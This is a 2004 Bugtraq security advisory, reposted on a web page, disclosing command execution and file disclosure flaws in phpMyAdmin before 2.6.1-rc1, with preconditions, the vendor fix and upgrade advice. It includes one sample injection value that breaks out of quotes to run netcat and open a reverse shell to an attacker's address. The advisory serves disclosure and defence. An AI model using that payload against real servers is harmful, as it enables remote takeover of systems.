模板
教程
环境
性能
功能
管理
MultiplevulnerabilitiesinphpMyAdmin
发表于:2007-05-25来源:作者:点击数:
标签:
List: bugtraq Subject: Multiple vulnerabilities in phpMyAdmin From: Nicolas Gregoire ngregoire () exaprobe ! com Date: 2004-12-13 13:02:09 Message-ID: "> 1102942929.1530.220.camel () bobby ! exaprobe ! com [ Download message RAW ] Exaprobe
List: bugtraqSubject: Multiple vulnerabilities in phpMyAdmin
From: Nicolas Gregoire <ngregoire () exaprobe ! com>
Date: 2004-12-13 13:02:09
Message-ID: <1102942929.1530.220.camel () bobby ! exaprobe ! com>
[Download message RAW]
Exaprobe
www.exaprobe.com
Security Advisory
Advisory Name: Multiple vulnerabilities in phpMyAdmin
Release Date: 13 December 2004
Application: phpMyAdmin prior to 2.6.1-rc1
Platform: Any webserver running PHP
Severity: Remote code execution
Author: Nicolas Gregoire <ngregoire@exaprobe.com>
Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html
Overview :
==========
phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.
Technical details :
===================
Command execution :
- bug introduced in 2.6.0-pl2
- attacker does *not* need aclearcase/" target="_blank" >ccess to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A
File disclosure :
- attacker need access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'
Vendor Response :
=================
After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.
Recommendation :
================
Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.
CVE Information :
=================
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
CAN-2004-1147 Command execution in phpMyAdmin
CAN-2004-1148 File disclosure in phpMyAdmin
--
Nicolas Gregoire ----- Consultant en S閏urit?des Syst鑝es d'Information
ngregoire@exaprobe.com ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F
